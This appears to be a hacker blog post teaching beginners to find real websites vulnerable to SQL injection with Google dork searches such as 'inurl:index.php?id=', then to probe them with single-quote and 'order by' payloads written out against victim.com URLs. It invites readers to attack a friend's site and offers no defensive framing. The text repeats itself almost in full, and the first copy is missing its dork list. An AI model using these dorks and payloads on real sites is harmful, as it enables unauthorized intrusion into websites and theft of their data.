Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks.
Small List of Google Dork:
Download A large list of Google dork
copy one from above list and paste in google search box,hit enter
You can see list of websites ending with that url for eg:
Go to that link.
add ' (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2'
Now hit enter.
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further.
Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
Note:
if you want to hack particular website like www.yourfriendwebsite.com, then go to that website. Find the
webpage that ends with any of google dorks list items.
Small List of Google Dork:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:post.php?id=
inurl:article?id=
inurl:gallery.php?id=
inurl:post.php?id=
inurl:article?id=
Download A large list of Google dork
copy one from above list and paste in google search box,hit enter
You can see list of websites ending with that url for eg:
http://www.victim.com/index.php?id=2
Go to that link.
add ' (single quote) at the end of the url.
For eg:
http://www.victim.com/index.php?id=2'
Now hit enter.
if the page remains in the same page,then it is not vulnerable website.
If the page show any error or show blank page, then it is vulnerable website.
Now let's check further.
Remove single quote from url
Then add this "order by x" (without quotes)
replace the x with 0,1,2,....n.(until it show error page).
For Eg:
http://www.victim.com/index.php?id=2 order by 1 (no error)
http://www.victim.com/index.php?id=2 order by 2 (no error)
http://www.victim.com/index.php?id=2 order by 3 (no error)
http://www.victim.com/index.php?id=2 order by 4 (no error)
http://www.victim.com/index.php?id=2 order by 5(error)
Now you can come to one conclusion is that website has 4 columns.
Also it is vulnerable.
If the above method is not working,then try this:
http://www.victim.com/index.php?id=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 order by 5--(error)
If this is also not working,then try this:
http://www.victim.com/index.php?id=2 and 1=2 order by 1-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 2-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 3-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 4-- (no error)
http://www.victim.com/index.php?id=2 and 1=2 order by 5--(error)
Note:
if you want to hack particular website like www.yourfriendwebsite.com, then go to that website. Find the
webpage that ends with any of google dorks list items.
No comments:
Post a Comment